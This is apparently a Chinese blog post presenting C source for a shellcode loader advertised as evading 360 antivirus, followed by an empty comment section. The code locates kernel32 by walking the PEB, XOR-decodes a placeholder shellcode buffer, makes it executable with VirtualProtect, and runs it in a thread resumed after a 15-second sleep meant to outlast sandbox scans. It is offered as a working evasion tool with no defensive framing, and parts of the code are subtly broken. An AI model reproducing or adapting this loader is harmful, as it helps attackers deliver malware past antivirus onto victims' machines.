免杀360的shellcode加载器

#include <Windows.h>
#include <stdio.h>
HMODULE  GetKernel32Addr() {
        HMODULE Kernel32Base = 0;
        _asm {
                mov eax, fs:[0x30] //peb
                mov eax, dword ptr[eax + 0xc]//_PEB_LDR_DATA
                mov eax, dword ptr[eax + 0xc]//InLoadOrderModuleList 
                mov eax, [eax] //ntdll
                mov eax, [eax] //kernel32dll
                mov eax, dword ptr[eax + 0x18]
                mov Kernel32Base, eax
        }
        return Kernel32Base;
}

void start() {

        unsigned char buf[] = "shellcode"  //
        
        unsigned char shellcode[842];
        int len = sizeof(shellcode) - 1;
        for (size_t i = 0; i < len; i++)
        {
                buf[i] ^= 10;
                shellcode[i] = buf[i];
        }

        typedef BOOL(WINAPI *pVirtualProtect)(LPVOID, DWORD, DWORD, PDWORD);


        DWORD oldProtect = 0;
        HMODULE hKernal32 = GetKernel32Addr();

        pVirtualProtect VirtualProtect = (pVirtualProtect)GetProcAddress(hKernal32, "VirtualProtect");

        VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);

        //VirtualProtect(&shellcode, sizeof(shellcode), oldProtect, NULL);
        HANDLE handle = CreateThread(0,0,shellcode, CREATE_SUSPENDED,0,0);
        Sleep(15000);
        ResumeThread(handle);
}

void main() {

        
        
        start();
}


评论区

评论一下~


8+6=?

暂无评论,要不来一发?

回到顶部